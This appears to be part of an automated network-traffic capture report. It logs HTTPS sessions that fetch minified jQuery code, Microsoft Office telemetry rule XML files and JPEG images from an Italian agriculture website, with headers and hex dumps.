                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 76 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 76 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53
                                                                                                                                          Data Ascii: }:function(e,t,n){var r,i,o,a,s,u,l=v!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(v){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextS
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 74 29 29 26 26 72 2e 73 70 65 63 69 66 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 29 2c 73 65 7d 28 43 29 3b 53 2e 66 69 6e 64 3d 64 2c 53 2e 65 78 70 72 3d 64 2e 73 65 6c 65 63 74 6f 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20
                                                                                                                                          Data Ascii: etAttributeNode(t))&&r.specified?r.value:null}),se}(C);S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 29 2c 43 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 24 29 2c 53 2e 72 65 61 64 79 28 29 7d 53 2e 66 6e 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 46 2e 74 68 65 6e 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c
                                                                                                                                          Data Ascii: ),C.removeEventListener("load",$),S.ready()}S.fn.ready=function(e){return F.then(e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 20 6e 26 26 28 72 3d 72 7c 7c 6e 2c 6e 3d 76 6f 69 64 20 30 29 2c 74 29 45 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 54 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d
                                                                                                                                          Data Ascii: n&&(r=r||n,n=void 0),t)Ee(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Te;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,argum
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 41 65 2e 74 65 73 74 28 64 29 29 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 48 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29 29 2e 66 69 72 73 74 43 68 69 6c 64 2c 31 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 6f 29 29 7b 66 6f 72 28 73 3d 28 61 3d 53 2e 6d 61 70 28 79 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 44 65 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 63 2b 2b 29 75 3d 65 2c 63 21 3d 3d 70 26 26 28
                                                                                                                                          Data Ascii: Ae.test(d))return n.each(function(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),He(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)).firstChild,1===e.childNodes.length&&(e=t),t||o)){for(s=(a=S.map(ye(e,"script"),De)).length;c<f;c++)u=e,c!==p&&(
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 3d 3d 3d 28 6f 3d 74 79 70 65 6f 66 20 6e 29 26 26 28 69 3d 74 65 2e 65 78 65 63 28 6e 29 29 26 26 69 5b 31 5d 26 26 28 6e 3d 73 65 28 65 2c 74 2c 69 29 2c 6f 3d 22 6e 75 6d 62 65 72 22 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 3d 3d 6e 26 26 28 22 6e 75 6d 62 65 72 22 21 3d 3d 6f 7c 7c 75 7c 7c 28 6e 2b 3d 69 26 26 69 5b 33 5d 7c 7c 28 53 2e 63 73 73 4e 75 6d 62 65 72 5b 73 5d 3f 22 22 3a 22 70 78 22 29 29 2c 76 2e 63 6c 65 61 72 43 6c 6f 6e 65 53 74 79 6c 65 7c 7c 22 22 21 3d 3d 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e
                                                                                                                                          Data Ascii: ===(o=typeof n)&&(i=te.exec(n))&&i[1]&&(n=se(e,t,i),o="number"),null!=n&&n==n&&("number"!==o||u||(n+=i&&i[3]||(S.cssNumber[s]?"":"px")),v.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 2e 71 75 65 75 65 21 3d 3d 69 7c 7c 28 6e 5b 74 5d 2e 61 6e 69 6d 2e 73 74 6f 70 28 6f 29 2c 65 3d 21 31 2c 6e 2e 73 70 6c 69 63 65 28 74 2c 31 29 29 3b 21 65 26 26 6f 7c 7c 53 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 69 29 7d 29 7d 2c 66 69 6e 69 73 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 31 21 3d 3d 61 26 26 28 61 3d 61 7c 7c 22 66 78 22 29 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 59 2e 67 65 74 28 74 68 69 73 29 2c 6e 3d 74 5b 61 2b 22 71 75 65 75 65 22 5d 2c 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c
                                                                                                                                          Data Ascii: .queue!==i||(n[t].anim.stop(o),e=!1,n.splice(t,1));!e&&o||S.dequeue(this,i)})},finish:function(a){return!1!==a&&(a=a||"fx"),this.each(function(){var e,t=Y.get(this),n=t[a+"queue"],r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 65 76 65 6e 74 65 64 28 29 7c 7c 63 2e 5f 64 65 66 61 75 6c 74 26 26 21 31 21 3d 3d 63 2e 5f 64 65 66 61 75 6c 74 2e 61 70 70 6c 79 28 70 2e 70 6f 70 28 29 2c 74 29 7c 7c 21 56 28 6e 29 7c 7c 75 26 26 6d 28 6e 5b 64 5d 29 26 26 21 78 28 6e 29 26 26 28 28 61 3d 6e 5b 75 5d 29 26 26 28 6e 5b 75 5d 3d 6e 75 6c 6c 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64 3d 64 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 6e 5b 64 5d 28 29 2c 65 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 26 26 66 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 64 2c 77 74 29 2c 53 2e 65 76 65 6e 74 2e 74 72 69 67 67 65 72 65 64
                                                                                                                                          Data Ascii: evented()||c._default&&!1!==c._default.apply(p.pop(),t)||!V(n)||u&&m(n[d])&&!x(n)&&((a=n[u])&&(n[u]=null),S.event.triggered=d,e.isPropagationStopped()&&f.addEventListener(d,wt),n[d](),e.isPropagationStopped()&&f.removeEventListener(d,wt),S.event.triggered


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          113192.168.2.44987513.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:12 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:12 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 419
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                          ETag: "0x8DC582BB32BB5CB"
                                                                                                                                          x-ms-request-id: c3d74fa2-201e-0003-1d91-3ff85a000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103312Z-174f78459685m244hC1EWRgp2c0000000y10000000009s3v
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:13 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          114192.168.2.4498785.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:13 UTC632OUTGET /wp-content/uploads/sites/71/2018/04/0000_03.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:13 UTC281INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:13 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 22321
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:13 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                          2024-11-28 10:33:13 UTC7911INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 06 06 07 06 06 08 0a 08 09 09 09 09 08 0a 0a 0c 0c 0c 0c 0c 0a 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 04 05 05 08 07 08 0f 0a 0a 0f 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c2 00 11 08 00 fa 00 fa 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 04 01 02 03 05 06 07 00 08 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 01 ee 2f ce b2 2d
                                                                                                                                          Data Ascii: JFIFCC/-
                                                                                                                                          2024-11-28 10:33:13 UTC8000INData Raw: 49 16 ba 3c 21 f2 b2 2c 51 59 3f 93 1e 15 12 8b 48 c9 c4 a4 2c b6 c9 49 49 0f 10 b1 6a bb 93 6e c9 49 9e ad 0b 22 7e c4 71 76 b5 d8 f4 99 e9 33 d3 66 a5 9b 9b 33 bb 23 86 4c f4 39 a2 5e 7a 11 8f cf 3c a4 88 f9 23 e4 8f 93 21 2f c8 cb cb 17 91 78 e7 21 8f 94 48 93 3f d3 ff c4 00 44 10 00 01 02 03 04 05 07 08 08 05 05 01 00 00 00 00 01 00 02 03 11 21 04 12 22 31 13 32 41 51 71 10 20 23 61 81 91 a1 14 30 33 42 52 72 b1 d1 05 24 34 62 82 92 c1 e1 43 73 a2 b2 f0 53 93 d2 e2 f1 44 ff da 00 08 01 01 00 06 3f 02 e6 54 2a b5 13 0e a8 90 d9 2a b7 ce b6 0b cf 46 fa 29 8e 64 ca 93 79 2a 79 d9 2a f2 c9 c2 68 d2 e9 45 d0 84 f8 29 5c 2a ac 2a ad 2b 2e 65 72 1b 13 62 b7 55 dc ad 78 d8 a1 be 73 70 a1 e6 5d 0b af cd e1 2a 51 02 98 e4 c6 c0 55 61 05 7e 1c 10 f8 45 62 b1 8e
                                                                                                                                          Data Ascii: I<!,QY?H,IIjnI"~qv3f3#L9^z<#!/x!H?D!"12AQq #a03BRr$4bCsSD?T**F)dy*y*hE)\**+.erbUxsp]*QUa~Eb
                                                                                                                                          2024-11-28 10:33:14 UTC6410INData Raw: 95 3d a4 ff 00 ab 21 f6 24 67 4f e6 f8 89 f8 81 87 25 76 3c ed 9c 03 d2 0f d1 3f 31 77 42 f5 35 fd a7 fe 59 7e 68 83 96 58 33 6c 3c 3f b9 92 f6 5d 51 00 8a 49 dd e6 c9 e0 96 8b dd 8f ab 4e 99 4e c8 76 ec 81 bb 01 3f 37 fb 91 e9 7f 77 c9 5f 07 7e 5f f9 fc df 97 fe 7f 37 dd 5f 9f f7 59 f7 af f3 7c a9 e8 4c f5 e0 c5 0e 2c d0 e0 77 3f 9f e5 00 bd 4b 92 d1 c1 27 dd f5 e2 27 e0 91 c1 1e eb 7d 16 3d 78 43 90 30 bd 4c 9c 99 72 63 01 e5 8f ad f9 2c f8 2b 3b 23 22 44 81 69 13 81 84 46 76 84 b5 b3 29 dc da bd c3 8f 1c 39 c2 53 54 c8 cf 50 02 70 ca 71 04 96 de df 37 1d ad c6 37 e0 11 2e de d3 f4 49 0e 6a 24 dc ec 5f 0e 2c 88 b6 08 5c e3 0e ac 4c ef b9 21 c7 80 96 6f 4b da 97 7e 23 3c f1 20 ed b0 67 37 ce 34 df 70 87 f5 6e 00 7b 97 ee 78 42 92 31 e1 69 a9 58 3c 9e d2
                                                                                                                                          Data Ascii: =!$gO%v<?1wB5Y~hX3l<?]QINNv?7w_~_7_Y|L,w?K''}=xC0Lrc,+;#"DiFv)9STPpq77.Ij$_,\L!oK~#< g74pn{xB1iX<


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          115192.168.2.44987713.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:13 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:13 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 494
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                          ETag: "0x8DC582BB8972972"
                                                                                                                                          x-ms-request-id: baa0830a-001e-0082-4291-3f5880000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103313Z-174f7845968jrjrxhC1EWRmmrs0000000yfg000000003bfe
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:14 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                          116192.168.2.44987913.107.246.63443
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:13 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                          2024-11-28 10:33:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:13 GMT
                                                                                                                                          Content-Type: text/xml
                                                                                                                                          Content-Length: 420
                                                                                                                                          Connection: close
                                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                          x-ms-request-id: d3507608-601e-003d-4b91-3f6f25000000
                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                          x-azure-ref: 20241128T103313Z-174f7845968l4kp6hC1EWRe8840000000yeg000000009g8y
                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          2024-11-28 10:33:14 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          117192.168.2.4498805.57.41.1194432692C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-28 10:33:13 UTC653OUTGET /wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture.jpg HTTP/1.1
                                                                                                                                          Host: www.agriparadigma.it
                                                                                                                                          Connection: keep-alive
                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                          Referer: https://www.agriparadigma.it/
                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                          2024-11-28 10:33:14 UTC281INHTTP/1.1 200 OK
                                                                                                                                          Date: Thu, 28 Nov 2024 10:33:14 GMT
                                                                                                                                          Server: Apache
                                                                                                                                          Last-Modified: Tue, 29 May 2018 16:08:40 GMT
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          Content-Length: 27444
                                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                                          Expires: Fri, 28 Nov 2025 10:33:14 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Type: image/jpeg
